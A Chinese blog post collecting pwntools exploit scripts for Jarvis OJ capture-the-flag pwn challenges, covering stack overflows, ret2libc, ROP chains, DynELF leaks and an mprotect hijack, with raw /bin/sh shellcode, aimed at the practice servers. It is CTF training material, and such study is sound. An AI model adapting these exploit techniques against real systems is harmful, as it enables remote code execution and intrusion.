最近做了Jarvis OJ的一部分pwn题,收获颇丰,现在这里简单记录一下exp,分析过程和思路以后再补上

Tell Me Something
此题与level0类似,请参考level0的writeup

http://www.cnblogs.com/WangAoBo/p/7591552.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 elf = ELF('./guestbook')

 good_game_addr = elf.symbols['good_game']

 #  io = process('./guestbook')

 io = remote('pwn.jarvisoj.com', 9876)

 payload = 'A' * 0x88 + p64(good_game_addr)

 io.recvuntil('message:\n')

 io.send(payload)

 print io.recvall()

 io.close()

Smashes

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 flag_addr = 0x400d21

 #  offset = 0x7fffffffcd68 - 0x7fffffffcb50

 #  payload = 'A' * offset + p64(flag_addr)

 payload = p64(flag_addr) * 200

 io = remote('pwn.jarvisoj.com', 9877)

 #  io = process('./smashes')

 io.recvuntil('name? ')

 io.sendline(payload)

 #  io.recvuntil('flag: ')

 io.recv()

 io.sendline()

 io.recv()
Test Your Memory
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./memory')

 win_func_addr = elf.symbols['win_func']

 cat_flag_addr = elf.search('cat flag').next()

 payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

 #  io = process('./memory')

 io = remote('pwn2.jarvisoj.com', 9876)

 io.recvuntil('> ')

 io.sendline(payload)

 print io.recvall()

 io.close()

[XMAN]level0

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level0')

 callsys_addr = elf.symbols['callsystem']

 #  io = process('./level0')

 io = remote('pwn2.jarvisoj.com', 9881)

 io.recvuntil('World\n')

 payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level1

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 shellcode = asm(shellcraft.i386.linux.sh())

 #  io = process('./level1')

 io = remote('pwn2.jarvisoj.com', 9877)

 text = io.recvline()[14: -2]

 #  print text[14:-2]

 buf_addr = int(text, 16)

 payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 #  io = process('./level2')

 io = remote('pwn2.jarvisoj.com', 9878)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level2_x64

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 elf = ELF('./level2_x64')

 sys_addr = elf.symbols['system']

 sh_addr = elf.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 #  print type(p_rdi_r_addr)

 payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

 #  io = process('./level2_x64')

 io = remote('pwn2.jarvisoj.com', 9882)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3

level2_x64与level3_x64放在一块分析

http://www.cnblogs.com/WangAoBo/p/7966773.html
 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3')

     libc = ELF('/lib/i386-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9879)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u32(io.recv(4))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level3_x64

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 local = 0

 if local:

     io = process('./level3_x64')

     libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9883)

     libc = ELF('./libc-2.19.so')

 elf = ELF('./level3_x64')

 start_elf_addr = elf.symbols['_start']

 write_elf_addr = elf.symbols['write']

 read_got_addr = elf.got['read']

 read_libc_addr = libc.symbols['read']

 sys_libc_addr = libc.symbols['system']

 sh_libc_addr = libc.search('/bin/sh').next()

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0)

 payload += p64(write_elf_addr)

 payload += p64(start_elf_addr)

 io.recvuntil('Input:\n')

 io.send(payload)

 read_addr = u64(io.recv(0x8))

 offset = read_addr - read_libc_addr

 sys_addr = offset + sys_libc_addr

 sh_addr = offset + sh_libc_addr

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(sh_addr)

 payload += p64(sys_addr)

 payload += p64(0xdeadbeef)

 io.recvuntil('Input:\n')

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level4

 !/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 from pwn import *

 context.log_level = 'debug'

 #  io = process('./level4')

 io = remote('pwn2.jarvisoj.com', 9880)

 elf = ELF('./level4')

 write_elf_addr = elf.symbols['write']

 start_elf_addr = elf.symbols['_start']

 read_elf_addr = elf.symbols['read']

 bss_addr = elf.bss()

 def leak(addr):

     payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)

     io.send(payload)

     leaked = io.recv(4)

     log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))

     return leaked

 d = DynELF(leak, elf = ELF('./level4'))

 sys_addr = d.lookup('system', 'libc')

 log.info("sys_addr -> 0x%x" % sys_addr)

 payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)

 io.send(payload)

 io.send('/bin/sh\0')

 sh_addr = bss_addr

 payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

 io.send(payload)

 io.interactive()

 io.close()

[XMAN]level5

 #!/usr/bin/env python

 # -*- coding: utf-8 -*-

 __Auther__ = 'M4x'

 def Debug():

     raw_input("waiting for debug:")

     gdb.attach(io, "b *0x0000000000400618")

 from pwn import *

 context.terminal = ['deepin-terminal', '-x', 'bash', '-c']

 context.log_level = 'debug'

 elf = ELF('./level5')

 rop = ROP(elf)

 p_rdi_r_addr = rop.rdi[0]

 p_rsi_r15_r_addr = rop.rsi[0]

 p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa

 mov_call = 0x0000000000400690

 local = 0

 if local:

     io = process('./level5')

     libc = ELF('./libc.so.6')

 else:

     io = remote('pwn2.jarvisoj.com', 9884)

     libc = ELF('./libc-2.19.so')

 io.recvuntil('Input:\n')

 log.info("Step 1: leak read_addr")

 read_libc_addr = libc.symbols['read']

 read_got_addr = elf.got['read']

 write_elf_addr = elf.symbols['write']

 vuln_elf_addr = elf.symbols['vulnerable_function']

 payload = 'A' * (0x80 + 0x8)

 payload += p64(p_rdi_r_addr)

 payload += p64(0x1)

 payload += p64(p_rsi_r15_r_addr)

 payload += p64(read_got_addr)

 payload += p64(0x0000)

 payload += p64(write_elf_addr)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 read_addr = u64(io.recv(8))

 io.recvuntil('Input:\n')

 log.info("leaked read_addr -> 0x%x" % read_addr)

 log.info("Step 2: write shellcode 2 bss")

 sh_addr = bss_addr = elf.bss()

 shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

 payload = 'B' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(len(shellcode) + 1)

 payload += p64(bss_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'C' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(shellcode + '\0')

 io.recvuntil('Input:\n')

 log.info("Step 3: hijack mprotect 2 __gmon_start__")

 mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']

 mprotect_hijack_addr = 0x0000000000600a70

 payload = 'D' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'E' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(mprotect_addr))

 io.recvuntil('Input:\n')

 log.info("Step 4: hijack sh/bss 2 __libc_start_main")

 sh_hijack_addr = 0x0000000000600a68

 payload = 'F' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(read_got_addr)

 payload += p64(0x8)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += 'G' * (7 * 8)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 io.send(p64(sh_addr))

 io.recvuntil('Input:\n')

 log.info("Step 5: fix bss 2 777")

 payload = 'H' * (0x80 + 0x8)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(mprotect_hijack_addr)

 payload += p64(0x7)

 #  payload += p64(len(shellcode) + 1)

 #  payload += p64(sh_hijack_addr)

 payload += p64(0x1000)

 payload += p64(0x00600000)

 payload += p64(mov_call)

 payload += 'I' * (7 * 8)

 payload += p64(vuln_elf_addr)

 #  Debug()

 io.send(payload)

 io.recvuntil('Input:\n')

 log.info("Step 6: execv shllcode")

 payload = 'J' * (0x80 + 0x8)

 #  payload += p64(sh_addr)

 payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)

 payload += p64(0x0)

 payload += p64(0x1)

 payload += p64(sh_hijack_addr)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(0x0)

 payload += p64(mov_call)

 payload += p64(vuln_elf_addr)

 io.send(payload)

 log.info("Step 7: getshell")

 io.interactive()

 io.close()

Jarvis OJ - 栈系列部分pwn - Writeup的更多相关文章

  1. Jarvis OJ - 软件密码破解-1 -Writeup

    Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调 ...

  2. Jarvis OJ - [XMAN]level1 - Writeup

    Jarvis OJ - [XMAN]level1 - Writeup M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html 题目: 分 ...

  3. Jarvis OJ - class10 -Writeup

    Jarvis OJ - class10 -Writeup 转载请注明出处:http://www.cnblogs.com/WangAoBo/p/7552266.html 题目: Jarivs OJ的一道 ...

  4. Jarvis OJ - DD-Hello -Writeup

    Jarvis OJ - DD-Hello -Writeup 转载请注明出处http://www.cnblogs.com/WangAoBo/p/7239216.html 题目: 分析: 第一次做这道题时 ...

  5. Jarvis OJ - 爬楼梯 -Writeup

    Jarvis OJ - 爬楼梯 -Writeup 本来是想逆一下算法的,后来在学长的指导下发现可以直接修改关键函数,这个题做完有种四两拨千斤的感觉,记录在这里 转载请标明出处:http://www.c ...

  6. Jarvis OJ - Baby's Crack - Writeup

    Jarvis OJ - Baby's Crack - Writeup M4x原创,欢迎转载,转载请表明出处 这是我第一次用爆破的方法做reverse,值得记录一下 题目: 文件下载 分析: 下载后解压 ...

  7. Jarvis OJ部分逆向

    Jarvis OJ部分逆向题解 很久没有写博客了,前天上Jarvis OJ刷了几道逆向,保持了一下感觉.都是简单题目,写个writeup记录一下. easycrackme int __cdecl ma ...

  8. Jarvis OJ - [XMAN]level3 - Writeup——ret2libc尝试

    这次除了elf程序还附带一个动态链接库 先看一下,很一般的保护 思路分析 在ida中查看,可以确定通过read函数输入buf进行溢出,但是并没有看到合适的目标函数 但是用ida打开附带的链接库,可以看 ...

  9. Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用

    100分的pwn 简单查看一下,果然还是比较简单的 放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护 所以我们很容易想到构造shellcode, ...

随机推荐

  1. Vue项目中实现tab栏和步骤条的数据联动

    也就是tab栏切换步骤条随之变化 <template>   <div>     <!-- 面包屑导航  -->     <el-breadcrumb sepa ...

  2. 【感知机模型】手写代码训练 / 使用sklearn的Perceptron模块训练

    读取原始数据 import pandas as pd import numpy as np in_data = pd.read_table('./origin-data/perceptron_15.d ...

  3. 基于光盘配置yum源

    #开启自动挂载服务 systemctl start autofs #设置开机自动挂载 systemctl enable autofs #光盘自动挂载路径/misc/cd       “包含repoda ...

  4. 关于GET和POST请求的区别,最通俗全面的回答

    GET和POST是HTTP请求的两种基本方法,要说它们的区别,接触过WEB开发的人都能说出一二. 最直观的区别就是GET把参数包含在URL中,POST通过request body传递参数. 你可能自己 ...

  5. 51Nod 1183 编辑距离 (字符串相似算法)

    编辑距离,又称Levenshtein距离(也叫做Edit Distance),是指两个字串之间,由一个转成另一个所需的最少编辑操作次数.许可的编辑操作包括将一个字符替换成另一个字符,插入一个字符,删除 ...

  6. css 字体旋转

    <div v-else> <img src="/img/dashboard/nodata.png"> <div style="color: ...

  7. 问题 C: 查找

    #include <cstdio> #include <vector> #include <algorithm> using namespace std; bool ...

  8. easyui datagrid设置排序

    sortable="true" order="desc" 或者 sortable:true,order:'desc'

  9. elasitic search fresh flush segment merge

    new document首先在in memory buffer 中 (1)fresh 触发条件:默认one second 执行一次 执行过程:将memory buffer中documents 写入至f ...

  10. 使用javacv 截取视频指定帧节

    个人博客 地址:https://www.wenhaofan.com/article/20190407105818 引入依赖 <dependency> <groupId>org. ...